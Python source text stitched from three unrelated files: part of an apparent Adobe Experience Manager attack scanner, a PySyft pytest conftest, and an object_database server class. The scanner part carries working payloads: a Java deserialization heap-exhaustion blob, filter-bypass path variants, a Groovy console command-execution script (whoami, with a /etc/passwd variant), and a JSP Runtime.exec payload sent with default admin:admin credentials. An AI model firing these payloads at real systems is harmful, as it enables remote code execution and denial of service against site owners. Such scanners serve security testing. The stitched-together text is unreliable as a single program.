DESERPAYLOAD = base64.b64decode('rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=') # Generated with oisdos - java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap
EXTERNALJOBSERVLET = itertools.product(('/libs/dam/cloud/proxy', '///libs///dam///cloud///proxy'),
('.json', '.css', '.js', '.html', '.ico', '.png', '.gif', '.1.json',
'...4.2.1...json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
EXTERNALJOBSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in EXTERNALJOBSERVLET)
results = []
for path in EXTERNALJOBSERVLET:
url = normalize_url(base_url, path)
data = {':operation': ('', 'job'), 'file': ('jobevent', DESERPAYLOAD, 'application/octet-stream')}
headers = {'Referer': base_url}
try:
resp = http_request_multipart(url, data=data, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 500 and 'Java heap space' in str(resp.content):
f = Finding('ExternalJobServlet', url,
'ExternalJobServlet is vulnerable to Java untrusted data deserialization. '
'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=102')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='deser_externaljob_servlet', url=url)
return results
@register('webdav')
def exposed_webdav(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WEBDAV = itertools.product(('/crx/repository/test', ),
('', '.json', '.css', '.html', '.ico',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'/{0}.css', '/{0}.html', '/{0}.ico'))
WEBDAV = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in WEBDAV)
results = []
for path in WEBDAV:
try:
url = normalize_url(base_url, path)
resp = http_request(url, proxy=proxy, debug=debug)
www_authenticate = resp.headers.get('WWW-Authenticate', '').lower()
if resp.status_code == 401 and 'webdav' in www_authenticate:
f = Finding('WebDAV exposed', url,
'WebDAV might we vulnerable to CVE-2015-1833. Check it manually. '
'See - http://mail-archives.apache.org/mod_mbox/jackrabbit-announce/201505.mbox/raw/%[email protected]%3E/3')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_webdav', url=url)
return results
@register('groovy_console')
def exposed_groovy_console(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
SCRIPT = 'def%20command%20%3D%20%22whoami%22%0D%0Adef%20proc%20%3D%20command.execute%28%29%0D%0Aproc.waitFor%28%29%0D%0Aprintln%20%22%24%7Bproc.in.text%7D%22' # 'def+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.text'
GROOVYSCRIPT1 = itertools.product(('/bin/groovyconsole/post.servlet', '///bin///groovyconsole///post.servlet'),
('', '.css', '.html', '.ico', '.json', '.1.json', '...4.2.1...json', ';%0a{0}.css',
';%0a{0}.html', ';%0a{0}.ico'))
GROOVYSCRIPT1 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT1)
GROOVYSCRIPT2 = itertools.product(('/etc/groovyconsole/jcr:content.html', '///etc///groovyconsole///jcr:content.html'),
('', '/{0}.css', '/{0}.html', '/{0}.ico', '/{0}.1.json', '/{0}...4.2.1...json',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
GROOVYSCRIPT2 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT2)
GROOVYAUDIT = itertools.product(('/bin/groovyconsole/audit.servlet', '///bin///groovyconsole///audit.servlet'),
('', '.css', '.js', '.html', '.ico', '.png', '.json', '.1.json', '...4.2.1...json',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
GROOVYAUDIT = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYAUDIT)
results = []
for path in itertools.chain(GROOVYSCRIPT1, GROOVYSCRIPT2):
url = normalize_url(base_url, path)
data = 'script={}'.format(SCRIPT)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
try:
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
f = Finding('GroovyConsole', url, 'Groovy console is exposed, RCE is possible. '
'See - https://github.com/OlsonDigital/aem-groovy-console')
if resp.status_code == 200:
if 'executionResult' in str(resp.content):
results.append(f)
break
try:
json.loads(resp.content.decode())['output']
except:
pass
else:
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_groovy_console', url=url)
for path in GROOVYAUDIT:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['data']
except:
pass
else:
f = Finding('GroovyConsole', url, 'Groovy console is exposed. '
'See - https://github.com/OlsonDigital/aem-groovy-console')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_groovy_console', url=url)
return results
@register('acs_tools')
def exposed_acs_tools(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DATA = 'scriptdata=%0A%3C%25%40+page+import%3D%22java.io.*%22+%25%3E%0A%3C%25+%0A%09Process+proc+%3D+Runtime.getRuntime().exec(%22echo+abcdef31337%22)%3B%0A%09%0A%09BufferedReader+stdInput+%3D+new+BufferedReader(new+InputStreamReader(proc.getInputStream()))%3B%0A%09StringBuilder+sb+%3D+new+StringBuilder()%3B%0A%09String+s+%3D+null%3B%0A%09while+((s+%3D+stdInput.readLine())+!%3D+null)+%7B%0A%09%09sb.append(s+%2B+%22%5C%5C%5C%5Cn%22)%3B%0A%09%7D%0A%09%0A%09String+output+%3D+sb.toString()%3B%0A%25%3E%0A%3C%25%3Doutput+%25%3E&scriptext=jsp&resource='
FIDDLE = itertools.product(
('/etc/acs-tools/aem-fiddle/_jcr_content.run.html', '/etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html'),
('', '/{0}.css', '/{0}.ico', '/a.png', '/{0}.json', '/{0}.1.json', '?{0}.css', '?{0}.ico'))
FIDDLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FIDDLE)
PREDICATES = ('/bin/acs-tools/qe/predicates.json',)
results = []
for path in FIDDLE:
url = normalize_url(base_url, path)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url, 'Authorization': 'Basic YWRtaW46YWRtaW4='}
try:
resp = http_request(url, 'POST', data=DATA, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'abcdef31337' in str(resp.content):
f = Finding('ACSTools', url, 'ACS Tools Fiddle is exposed, RCE is possible. '
'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_acs_tools', url=url)
for path in PREDICATES:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'relativedaterange' in str(resp.content):
f = Finding('ACSTools', url, 'ACS Tools predicates. '
'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_acs_tools', url=url)
return results
def parse_args():
parser = argparse.ArgumentParser(description='AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps')
parser.add_argument('-u', '--url', help='url to scan')
parser.add_argument('--proxy', help='http and https proxy')
parser.add_argument('--debug', action='store_true', help='debug output')
parser.add_argument('--host', help='hostname or IP to use for back connections during SSRF detection')
parser.add_argument('--port', type=int, default=80, help='opens port for SSRF detection')
parser.add_argument('--workers', type=int, default=3, help='number of parallel workers')
parser.add_argument('-H', '--header', nargs='*', help='extra http headers to attach')
parser.add_argument('--handler', action='append', help='run specific handlers, if omitted run all handlers')
parser.add_argument('--listhandlers', action='store_true', help='list available handlers')
return parser.parse_args(sys.argv[1:])
def run_detector(port): # Run SSRF detector in separate thread
global token, d
handler = lambda *args: Detector(token, d, *args)
httpd = HTTPServer(('', port), handler)
t = Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
return httpd
def main():
global extra_headers
args = parse_args()
if args.listhandlers:
print('[*] Available handlers: {0}'.format(list(registered.keys())))
sys.exit(1337)
if args.proxy:
p = args.proxy
proxy = {'http': p, 'https': p}
else:
proxy = {}
if args.header:
for header in args.header:
header_data = header.split(':')
extra_headers[header_data[0].strip()] = header_data[1].strip()
else:
extra_headers = {}
if not args.url:
print('You must specify the -u parameter, bye.')
sys.exit(1337)
if not args.host:
print('You must specify the --host parameter, bye.')
sys.exit(1337)
if not preflight(args.url, proxy):
print('Seems that you provided bad URL. Try another one, bye.')
sys.exit(1337)
httpd = run_detector(args.port)
handlers_to_run = registered.values()
if args.handler:
handlers_to_run = []
for name in args.handler:
handler_func = registered.get(name)
if handler_func:
handlers_to_run.append(handler_func)
with concurrent.futures.ThreadPoolExecutor(args.workers) as tpe:
futures = []
for check in handlers_to_run:
my_host = '{0}:{1}'.format(args.host, args.port)
futures.append(tpe.submit(check, args.url, my_host, args.debug, proxy))
for future in concurrent.futures.as_completed(futures):
for finding in future.result():
print('[+] New Finding!!!')
print('\tName: {}'.format(finding.name))
print('\tUrl: {}'.format(finding.url))
print('\tDescription: {}\n\n'.format(finding.description))
httpd.shutdown()
if __name__ == '__main__':
main()
|
conftest.py
|
# stdlib
import logging
from multiprocessing import Process
import socket
from time import time
from typing import Any as TypeAny
from typing import Callable as TypeCallable
from typing import Dict as TypeDict
from typing import Generator
from typing import List as TypeList
# third party
import _pytest
import pytest
# syft absolute
import syft as sy
from syft import logger
from syft.grid.example_nodes.network import signaling_server as start_signaling_server
from syft.lib import VendorLibraryImportException
from syft.lib import _load_lib
from syft.lib import vendor_requirements_available
# relative
from .syft.notebooks import free_port
logger.remove()
@pytest.fixture(scope="session")
def signaling_server() -> Generator:
port = free_port()
proc = Process(target=start_signaling_server, args=(port, "127.0.0.1"))
proc.start()
start = time()
while time() - start < 15:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if s.connect_ex(("127.0.0.1", port)) == 0:
break
else:
raise TimeoutError("Can't connect to the signaling server")
yield port
proc.terminate()
@pytest.fixture
def caplog(caplog: _pytest.logging.LogCaptureFixture) -> Generator:
class PropogateHandler(logging.Handler):
def emit(self, record: logging.LogRecord) -> None:
logging.getLogger(record.name).handle(record)
logger.add(PropogateHandler())
yield caplog
logger.remove()
def pytest_addoption(parser: _pytest.config.argparsing.Parser) -> None:
parser.addoption(
"--runslow", action="store_true", default=False, help="run slow tests"
)
def pytest_configure(config: _pytest.config.Config) -> None:
config.addinivalue_line("markers", "slow: mark test as slow to run")
config.addinivalue_line("markers", "fast: mark test as fast to run")
config.addinivalue_line("markers", "all: all tests")
config.addinivalue_line("markers", "asyncio: mark test as asyncio")
config.addinivalue_line("markers", "vendor: mark test as vendor library")
config.addinivalue_line("markers", "libs: runs valid vendor tests")
config.addinivalue_line("markers", "benchmark: runs benchmark tests")
config.addinivalue_line("markers", "torch: runs torch tests")
config.addinivalue_line("markers", "duet: runs duet notebook integration tests")
config.addinivalue_line("markers", "grid: runs grid tests")
def pytest_collection_modifyitems(
config: _pytest.config.Config, items: TypeList[TypeAny]
) -> None:
# $ pytest -m fast for the fast tests
# $ pytest -m slow for the slow tests
# $ pytest -m all for all the tests
# $ pytest -m libs for the vendor tests
slow_tests = pytest.mark.slow
fast_tests = pytest.mark.fast
duet_tests = pytest.mark.duet
grid_tests = pytest.mark.grid
all_tests = pytest.mark.all
# dynamically filtered vendor lib tests
# there isn't any way to remove "vendor" so the only way to filter
# these tests is to add a different tag called "libs" and then run
# the tests against that dynamic keyword
vendor_tests = pytest.mark.libs # note libs != vendor
loaded_libs: TypeDict[str, bool] = {}
vendor_skip = pytest.mark.skip(reason="vendor requirements not met")
for item in items:
if item.location[0].startswith("PyGrid"):
# Ignore if PyGrid folder checked out in main dir
continue
if "grid" in item.keywords:
item.add_marker(grid_tests)
continue
# mark with: pytest.mark.vendor
# run with: pytest -m libs -n auto 0
if "vendor" in item.keywords:
vendor_requirements = item.own_markers[0].kwargs
# try to load the lib first and if it fails just skip
if "lib" in vendor_requirements:
lib_name = vendor_requirements["lib"]
if lib_name not in loaded_libs:
try:
_load_lib(lib=lib_name)
loaded_libs[lib_name] = True
except Exception as e:
print(f"Failed to load {lib_name}. {e}")
loaded_libs[lib_name] = False
if not loaded_libs[lib_name]:
item.add_marker(vendor_skip)
continue
try:
# test the vendor requirements of the specific test if the library
# was loaded successfully
if vendor_requirements_available(
vendor_requirements=vendor_requirements
):
if item.location[0].startswith("tests/syft/notebooks"):
item.add_marker(duet_tests)
else:
item.add_marker(vendor_tests)
item.add_marker(all_tests)
except VendorLibraryImportException as e:
print(e)
except Exception as e:
print(f"Unable to check vendor library: {vendor_requirements}. {e}")
continue
if "benchmark" in item.keywords:
continue
if "torch" in item.keywords:
item.add_marker(all_tests)
continue
item.add_marker(all_tests)
if "slow" in item.keywords:
item.add_marker(slow_tests)
else:
if item.location[0].startswith("tests/syft/notebooks"):
item.add_marker(duet_tests)
continue
# fast is the default catch all
item.add_marker(fast_tests)
@pytest.fixture(scope="session")
def node() -> sy.VirtualMachine:
return sy.VirtualMachine(name="Bob")
@pytest.fixture(autouse=True)
def node_store(node: sy.VirtualMachine) -> None:
node.store.clear()
@pytest.fixture(scope="session")
def client(node: sy.VirtualMachine) -> sy.VirtualMachineClient:
return node.get_client()
@pytest.fixture(scope="session")
def root_client(node: sy.VirtualMachine) -> sy.VirtualMachineClient:
return node.get_root_client()
# The unit tests require separate VM's as we have a common crypto store cache.
# TODO: The dependency should be modified to use common VM's
@pytest.fixture
def get_clients() -> TypeCallable[[int], TypeList[TypeAny]]:
def _helper_get_clients(nr_clients: int) -> TypeList[TypeAny]:
clients = [
sy.VirtualMachine(name=f"P_{i}").get_root_client()
for i in range(nr_clients)
]
return clients
return _helper_get_clients
|
server.py
|
# Copyright 2018 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from object_database.messages import ClientToServer, ServerToClient
from object_database.identity import IdentityProducer
from object_database.messages import SchemaDefinition
from object_database.core_schema import core_schema
import object_database.keymapping as keymapping
from object_database.util import Timer
from typed_python import *
import queue
import time
import logging
import threading
import traceback
DEFAULT_GC_INTERVAL = 900.0
class ConnectedChannel:
def __init__(self, initial_tid, channel, connectionObject, identityRoot):
super(ConnectedChannel, self).__init__()
self.channel = channel
self.initial_tid = initial_tid
self.connectionObject = connectionObject
self.missedHeartbeats = 0
self.definedSchemas = {}
self.subscribedTypes = {} # schema, type to the lazy transaction id (or -1 if not lazy)
self.subscribedIds = set() # identities
self.subscribedIndexKeys = {} # full index keys to lazy transaction id
self.identityRoot = identityRoot
self.pendingTransactions = {}
self._needsAuthentication = True
@property
def needsAuthentication(self):
return self._needsAuthentication
def authenticate(self):
self._needsAuthentication = False
def heartbeat(self):
self.missedHeartbeats = 0
def sendTransaction(self, msg):
# we need to cut the transaction down
self.channel.write(msg)
def sendInitializationMessage(self):
self.channel.write(
ServerToClient.Initialize(
transaction_num=self.initial_tid,
connIdentity=self.connectionObject._identity,
identity_root=self.identityRoot
)
)
def sendTransactionSuccess(self, guid, success, badKey):
self.channel.write(
ServerToClient.TransactionResult(transaction_guid=guid, success=success, badKey=badKey)
)
def handleTransactionData(self, msg):
guid = msg.transaction_guid
if guid not in self.pendingTransactions:
self.pendingTransactions[guid] = {
'writes': {},
'set_adds': {},
'set_removes': {},
'key_versions': set(),
'index_versions': set()
}
self.pendingTransactions[guid]['writes'].update({k: msg.writes[k] for k in msg.writes})
self.pendingTransactions[guid]['set_adds'].update({k: set(msg.set_adds[k]) for k in msg.set_adds if msg.set_adds[k]})
self.pendingTransactions[guid]['set_removes'].update({k: set(msg.set_removes[k]) for k in msg.set_removes if msg.set_removes[k]})
self.pendingTransactions[guid]['key_versions'].update(msg.key_versions)
self.pendingTransactions[guid]['index_versions'].update(msg.index_versions)
def extractTransactionData(self, guid):
return self.pendingTransactions.pop(guid)
class Server:
def __init__(self, kvstore, auth_token):
self._kvstore = kvstore
self._auth_token = auth_token
self._lock = threading.RLock()
self.verbose = False
self._gc_interval = DEFAULT_GC_INTERVAL
self._removeOldDeadConnections()
# InMemoryChannel or ServerToClientProtocol -> ConnectedChannel
self._clientChannels = {}
# id of the next transaction
self._cur_transaction_num = 0
# for each key, the last version number we committed
self._version_numbers = {}
self._version_numbers_timestamps = {}
# (schema,type) to set(subscribed channel)
self._type_to_channel = {}
# index-stringname to set(subscribed channel)
self._index_to_channel = {}
# for each individually subscribed ID, a set of channels
self._id_to_channel = {}
self.longTransactionThreshold = 1.0
self.logFrequency = 10.0
self.MAX_NORMAL_TO_SEND_SYNCHRONOUSLY = 1000
self.MAX_LAZY_TO_SEND_SYNCHRONOUSLY = 10000
self._transactions = 0
self._keys_set = 0
self._index_values_updated = 0
self._subscriptions_written = 0
self._subscriptionResponseThread = None
self._shouldStop = threading.Event()
# a queue of queue-subscription messages. we have to handle
# these on another thread because they can be quite large, and we don't want
# to prevent message processing on the main thread.
self._subscriptionQueue = queue.Queue()
# if we're building a subscription up, all the objects that have changed while our
# lock was released.
self._pendingSubscriptionRecheck = None
# fault injector to test this thing
self._subscriptionBackgroundThreadCallback = None
self._lazyLoadCallback = None
self._last_garbage_collect_timestamp = None
self.identityProducer = IdentityProducer(self.allocateNewIdentityRoot())
self._logger = logging.getLogger(__name__)
def start(self):
self._subscriptionResponseThread = threading.Thread(target=self.serviceSubscriptions)
self._subscriptionResponseThread.daemon = True
self._subscriptionResponseThread.start()
def stop(self):
self._shouldStop.set()
self._subscriptionQueue.put((None, None))
self._subscriptionResponseThread.join()
def allocateNewIdentityRoot(self):
with self._lock:
curIdentityRoot = self._kvstore.get(" identityRoot")
if curIdentityRoot is None:
curIdentityRoot = 0
else:
curIdentityRoot = deserialize(int, bytes.fromhex(curIdentityRoot))
result = curIdentityRoot
self._kvstore.set(" identityRoot", serialize(int, curIdentityRoot+1).hex())
return result
def serviceSubscriptions(self):
while not self._shouldStop.is_set():
try:
try:
(connectedChannel, msg) = self._subscriptionQueue.get(timeout=1.0)
if connectedChannel is not None:
self.handleSubscriptionOnBackgroundThread(connectedChannel, msg)
except queue.Empty:
pass
except Exception:
self._logger.error("Unexpected error in serviceSubscription thread:\n%s", traceback.format_exc())
def _removeOldDeadConnections(self):
connection_index = keymapping.index_key(core_schema.Connection, " exists", True)
oldIds = self._kvstore.getSetMembers(keymapping.index_key(core_schema.Connection, " exists", True))
if oldIds:
self._kvstore.setSeveral(
{keymapping.data_key(core_schema.Connection, identity, " exists"): None for identity in oldIds},
{},
{connection_index: set(oldIds)}
)
def checkForDeadConnections(self):
with self._lock:
heartbeatCount = {}
for c in list(self._clientChannels):
missed = self._clientChannels[c].missedHeartbeats
self._clientChannels[c].missedHeartbeats += 1
heartbeatCount[missed] = heartbeatCount.get(missed, 0) + 1
if missed >= 4:
self._logger.info(
"Connection %s has not heartbeat in a long time. Killing it.",
self._clientChannels[c].connectionObject._identity
)
c.close()
self.dropConnection(c)
self._logger.debug("Connection heartbeat distribution is %s", heartbeatCount)
def dropConnection(self, channel):
with self._lock:
if channel not in self._clientChannels:
self._logger.warn('Tried to drop a nonexistant channel')
return
connectedChannel = self._clientChannels[channel]
for schema_name, typename in connectedChannel.subscribedTypes:
self._type_to_channel[schema_name, typename].discard(connectedChannel)
for index_key in connectedChannel.subscribedIndexKeys:
self._index_to_channel[index_key].discard(connectedChannel)
if not self._index_to_channel[index_key]:
del self._index_to_channel[index_key]
for identity in connectedChannel.subscribedIds:
if identity in self._id_to_channel:
self._id_to_channel[identity].discard(connectedChannel)
if not self._id_to_channel[identity]:
del self._id_to_channel[identity]
co = connectedChannel.connectionObject
self._logger.info("Server dropping connection for connectionObject._identity = %s", co._identity)
del self._clientChannels[channel]
self._dropConnectionEntry(co)
def _createConnectionEntry(self):
identity = self.identityProducer.createIdentity()
exists_key = keymapping.data_key(core_schema.Connection, identity, " exists")
exists_index = keymapping.index_key(core_schema.Connection, " exists", True)
identityRoot = self.allocateNewIdentityRoot()
self._handleNewTransaction(
None,
{exists_key: serialize(bool, True).hex()},
{exists_index: set([identity])},
{},
[],
[],
self._cur_transaction_num
)
return core_schema.Connection.fromIdentity(identity), identityRoot
def _dropConnectionEntry(self, entry):
identity = entry._identity
exists_key = keymapping.data_key(core_schema.Connection, identity, " exists")
exists_index = keymapping.index_key(core_schema.Connection, " exists", True)
self._handleNewTransaction(
None,
{exists_key: None},
{},
{exists_index: set([identity])},
[],
[],
self._cur_transaction_num
)
def addConnection(self, channel):
try:
with self._lock:
connectionObject, identityRoot = self._createConnectionEntry()
connectedChannel = ConnectedChannel(
self._cur_transaction_num,
channel,
connectionObject,
identityRoot
)
self._clientChannels[channel] = connectedChannel
channel.setClientToServerHandler(
lambda msg: self.onClientToServerMessage(connectedChannel, msg)
)
connectedChannel.sendInitializationMessage()
except Exception:
self._logger.error(
"Failed during addConnection which should never happen:\n%s",
traceback.format_exc()
)
def _handleSubscriptionInForeground(self, channel, msg):
# first see if this would be an easy subscription to handle
with Timer("Handle subscription in foreground: %s/%s/%s/isLazy=%s over %s",
msg.schema, msg.typename, msg.fieldname_and_value, msg.isLazy, lambda: len(identities)):
typedef, identities = self._parseSubscriptionMsg(channel, msg)
if not (msg.isLazy and len(identities) < self.MAX_LAZY_TO_SEND_SYNCHRONOUSLY or len(identities) < self.MAX_NORMAL_TO_SEND_SYNCHRONOUSLY):
self._subscriptionQueue.put((channel, msg))
return
# handle this directly
if msg.isLazy:
self._completeLazySubscription(
msg.schema, msg.typename, msg.fieldname_and_value,
typedef,
identities,
channel
)
return
self._sendPartialSubscription(
channel,
msg.schema,
msg.typename,
msg.fieldname_and_value,
typedef,
identities,
set(identities),
BATCH_SIZE=None,
checkPending=False
)
self._markSubscriptionComplete(
msg.schema,
msg.typename,
msg.fieldname_and_value,
identities,
channel,
isLazy=False
)
channel.channel.write(
ServerToClient.SubscriptionComplete(
schema=msg.schema,
typename=msg.typename,
fieldname_and_value=msg.fieldname_and_value,
tid=self._cur_transaction_num
)
)
def _parseSubscriptionMsg(self, channel, msg):
schema_name = msg.schema
definition = channel.definedSchemas.get(schema_name)
assert definition is not None, "can't subscribe to a schema we don't know about!"
assert msg.typename is not None
typename = msg.typename
assert typename in definition, "Can't subscribe to a type we didn't define in the schema: %s not in %s" % (typename, list(definition))
typedef = definition[typename]
if msg.fieldname_and_value is None:
field, val = " exists", keymapping.index_value_to_hash(True)
else:
field, val = msg.fieldname_and_value
if field == '_identity':
identities = set([val])
else:
identities = set(self._kvstore.getSetMembers(keymapping.index_key_from_names_encoded(schema_name, typename, field, val)))
return typedef, identities
def handleSubscriptionOnBackgroundThread(self, connectedChannel, msg):
with Timer("Subscription requiring %s messages and produced %s objects for %s/%s/%s/isLazy=%s",
lambda: messageCount,
lambda: len(identities),
msg.schema,
msg.typename,
msg.fieldname_and_value,
msg.isLazy
):
try:
with self._lock:
typedef, identities = self._parseSubscriptionMsg(connectedChannel, msg)
if connectedChannel.channel not in self._clientChannels:
self._logger.warn("Ignoring subscription from dead channel.")
return
if msg.isLazy:
assert msg.fieldname_and_value is None or msg.fieldname_and_value[0] != '_identity', 'makes no sense to lazily subscribe to specific values!'
messageCount = 1
self._completeLazySubscription(
msg.schema, msg.typename, msg.fieldname_and_value,
typedef,
identities,
connectedChannel
)
return True
self._pendingSubscriptionRecheck = []
# we need to send everything we know about 'identities', keeping in mind that we have to
# check any new identities that get written to in the background to see if they belong
# in the new set
identities_left_to_send = set(identities)
messageCount = 0
while True:
locktime_start = time.time()
if self._subscriptionBackgroundThreadCallback:
self._subscriptionBackgroundThreadCallback(messageCount)
with self._lock:
messageCount += 1
if messageCount == 2:
self._logger.info(
"Beginning large subscription for %s/%s/%s",
msg.schema, msg.typename, msg.fieldname_and_value
)
self._sendPartialSubscription(
connectedChannel,
msg.schema,
msg.typename,
msg.fieldname_and_value,
typedef,
identities,
identities_left_to_send
)
self._pendingSubscriptionRecheck = []
if not identities_left_to_send:
self._markSubscriptionComplete(
msg.schema,
msg.typename,
msg.fieldname_and_value,
identities,
connectedChannel,
isLazy=False
)
connectedChannel.channel.write(
ServerToClient.SubscriptionComplete(
schema=msg.schema,
typename=msg.typename,
fieldname_and_value=msg.fieldname_and_value,
tid=self._cur_transaction_num
)
)
break
# don't hold the lock more than 75% of the time.
time.sleep( (time.time() - locktime_start) / 3 )
if self._subscriptionBackgroundThreadCallback:
self._subscriptionBackgroundThreadCallback("DONE")
finally:
with self._lock:
self._pendingSubscriptionRecheck = None
def _completeLazySubscription(self,
schema_name,
typename,
fieldname_and_value,
typedef,
identities,
connectedChannel
):
index_vals = self._buildIndexValueMap(typedef, schema_name, typename, identities)
connectedChannel.channel.write(
ServerToClient.LazySubscriptionData(
schema=schema_name,
typename=typename,
fieldname_and_value=fieldname_and_value,
identities=identities,
index_values=index_vals
)
)
# just send the identities
self._markSubscriptionComplete(
schema_name,
typename,
fieldname_and_value,
identities,
connectedChannel,
isLazy=True
)
connectedChannel.channel.write(
ServerToClient.SubscriptionComplete(
schema=schema_name,
typename=typename,
fieldname_and_value=fieldname_and_value,
tid=self._cur_transaction_num
)
)
def _buildIndexValueMap(self, typedef, schema_name, typename, identities):
# build a map from reverse-index-key to {identity}
index_vals = {}
for fieldname in typedef.indices:
keys = [keymapping.data_reverse_index_key(schema_name, typename, identity, fieldname)
for identity in identities]
vals = self._kvstore.getSeveral(keys)
for i in range(len(keys)):
index_vals[keys[i]] = vals[i]
return index_vals
def _markSubscriptionComplete(self, schema, typename, fieldname_and_value, identities, connectedChannel, isLazy):
if fieldname_and_value is not None:
# this is an index subscription
for ident in identities:
self._id_to_channel.setdefault(ident, set()).add(connectedChannel)
connectedChannel.subscribedIds.add(ident)
if fieldname_and_value[0] != '_identity':
index_key = keymapping.index_key_from_names_encoded(schema, typename, fieldname_and_value[0], fieldname_and_value[1])
self._index_to_channel.setdefault(index_key, set()).add(connectedChannel)
connectedChannel.subscribedIndexKeys[index_key] = -1 if not isLazy else self._cur_transaction_num
else:
# an object's identity cannot change, so we don't need to track our subscription to it
assert not isLazy
else:
# this is a type-subscription
if (schema, typename) not in self._type_to_channel:
self._type_to_channel[schema, typename] = set()
self._type_to_channel[schema, typename].add(connectedChannel)
connectedChannel.subscribedTypes[(schema, typename)] = -1 if not isLazy else self._cur_transaction_num
def _sendPartialSubscription(self,
connectedChannel,
schema_name,
typename,
fieldname_and_value,
typedef,
identities,
identities_left_to_send,
BATCH_SIZE=100,
checkPending=True):
# get some objects to send
kvs = {}
index_vals = {}
to_send = []
if checkPending:
for transactionMessage in self._pendingSubscriptionRecheck:
for key in transactionMessage.writes:
transactionMessage.writes[key]
# if we write to a key we've already sent, we'll need to resend it
identity = keymapping.split_data_key(key)[2]
if identity in identities:
identities_left_to_send.add(identity)
for add_index_key in transactionMessage.set_adds:
add_index_identities = transactionMessage.set_adds[add_index_key]
add_schema, add_typename, add_fieldname, add_hashVal = keymapping.split_index_key_full(add_index_key)
if add_schema == schema_name and add_typename == typename and (
fieldname_and_value is None and add_fieldname == " exists" or
fieldname_and_value is not None and tuple(fieldname_and_value) == (add_fieldname, add_hashVal)
):
identities_left_to_send.update(add_index_identities)
while identities_left_to_send and (BATCH_SIZE is None or len(to_send) < BATCH_SIZE):
to_send.append(identities_left_to_send.pop())
for fieldname in typedef.fields:
keys = [keymapping.data_key_from_names(schema_name, typename, identity, fieldname)
for identity in to_send]
vals = self._kvstore.getSeveral(keys)
for i in range(len(keys)):
kvs[keys[i]] = vals[i]
index_vals = self._buildIndexValueMap(typedef, schema_name, typename, to_send)
connectedChannel.channel.write(
ServerToClient.SubscriptionData(
schema=schema_name,
typename=typename,
fieldname_and_value=fieldname_and_value,
values=kvs,
index_values=index_vals,
identities=None if fieldname_and_value is None else tuple(to_send)
)
)
def onClientToServerMessage(self, connectedChannel, msg):
assert isinstance(msg, ClientToServer)
# Handle Authentication messages
if msg.matches.Authenticate:
if msg.token == self._auth_token:
connectedChannel.authenticate()
# else, do we need to do something?
return
# Abort if connection is not authenticated
if connectedChannel.needsAuthentication:
self._logger.info(
"Received unexpected client message on unauthenticated channel %s",
connectedChannel.connectionObject._identity
)
return
# Handle remaining types of messages
if msg.matches.Heartbeat:
connectedChannel.heartbeat()
elif msg.matches.LoadLazyObject:
with self._lock:
self._loadLazyObject(connectedChannel, msg)
if self._lazyLoadCallback:
self._lazyLoadCallback(msg.identity)
elif msg.matches.Flush:
with self._lock:
connectedChannel.channel.write(ServerToClient.FlushResponse(guid=msg.guid))
elif msg.matches.DefineSchema:
assert isinstance(msg.definition, SchemaDefinition)
connectedChannel.definedSchemas[msg.name] = msg.definition
elif msg.matches.Subscribe:
with self._lock:
self._handleSubscriptionInForeground(connectedChannel, msg)
elif msg.matches.TransactionData:
connectedChannel.handleTransactionData(msg)
elif msg.matches.CompleteTransaction:
try:
data = connectedChannel.extractTransactionData(msg.transaction_guid)
with self._lock:
isOK, badKey = self._handleNewTransaction(
connectedChannel,
data['writes'],
data['set_adds'],
data['set_removes'],
data['key_versions'],
data['index_versions'],
msg.as_of_version
)
except Exception:
self._logger.error("Unknown error committing transaction: %s", traceback.format_exc())
isOK = False
badKey = "<NONE>"
connectedChannel.sendTransactionSuccess(msg.transaction_guid, isOK, badKey)
def indexReverseLookupKvs(self, adds, removes):
res = {}
for indexKey, identities in removes.items():
schemaname, typename, fieldname, valuehash = keymapping.split_index_key_full(indexKey)
